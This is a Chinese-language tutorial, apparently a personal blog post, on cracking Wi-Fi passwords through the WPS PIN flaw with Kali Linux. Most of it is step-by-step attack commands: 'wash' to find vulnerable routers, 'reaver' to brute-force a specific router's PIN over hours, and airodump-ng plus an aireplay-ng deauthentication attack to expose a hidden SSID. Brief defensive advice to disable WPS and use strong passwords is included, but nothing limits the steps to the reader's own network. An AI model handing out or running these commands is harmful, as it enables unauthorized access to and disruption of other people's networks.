來自wikipeida:
Wi-Fi保護設置(簡稱WPS,全稱Wi-Fi Protected Setup)是一個無線網絡安全標准,旨在讓家庭用戶使用無線網絡時簡化加密步驟。此標准由Wi-Fi聯盟(Wi-Fi Alliance)於2006年制定。
在2011年12月28日安全專家Stefan Viehbock報出此標准的一個重大安全漏洞,此漏洞允許遠程攻擊者使用暴力攻擊在幾小時內就能獲取WPS的PIN碼和WPA/WPA2的PSK碼。一些新出產的無線路默認啟動WPS功能,所以現在建議用戶關閉無線路由器上的WPS一鍵加密功能,雖然有些無線器上無法關閉此功能。
WPS的目的是簡化用戶輸入密碼的步驟;在某個設備連接wifi,需要輸入密碼時,只要按一下無線路由器上的wps按鈕就可以了。
Reaver是除字典破解之外的另一個選擇
如果無線路由器開啟了WPS,就不必使用上面的破解方法了。
WPS的pin碼並沒有加密。Reaver會暴力破解pin碼,找到pin碼也就找到了密碼。一般用時也不短。
注意:
- 網卡支持數據包注入,一般筆記本不支持
- 要求無線信號強
- 如果發送pin碼過快,有可能造成路由器崩潰;就類似對服務器的DDOS攻擊。
- Reaver有很多選項,我只使用最基本的選項,你也許需要根據情況使用其他選項。查看幫助:reaver ?
執行Kali Linux使用Aircrack破解wifi密碼(wpa/wpa2)
中的前三步,打開無線網卡的的監控模式。
3)找到開啟WPS功能的無線路由器
我們不用逐一測試,而是使用wash命令。
# wash -i wlan0mon -C
如果什么也沒有表示周圍沒有開啟WPS的無線路由器。記住要破解wifi的BSSID。
4)開始破解密碼
# reaver -i wlan0mon -b C8:3A:35:30:3E:C8 -vv -a
等待2-10小時:
最后,不要忘了結束無線網卡的監控模式:
# airmon-ng stop wlan0mon
總結
wps這個功能不用就把它關閉了吧。
一個小實驗:
我看到有人說隱藏SSID可以讓wifi更不容易被破解,我就來測試一下。
隱藏SSID就是把你老大的AP隱藏起來,不讓別人搜索到。請注意,這樣的話,在連接wifi時就要手動輸入AP名。
只看到了 length 12,沒有ap名。
# airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 wlan0mon
# aireplay-ng -0 30 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
破解密碼的方法不變;使用上面兩個命令就可以輕松得到ap名。
事實證明,隱藏SSID並不管啥事;其實設置一個復雜的密碼比隱藏SSID要管用的多。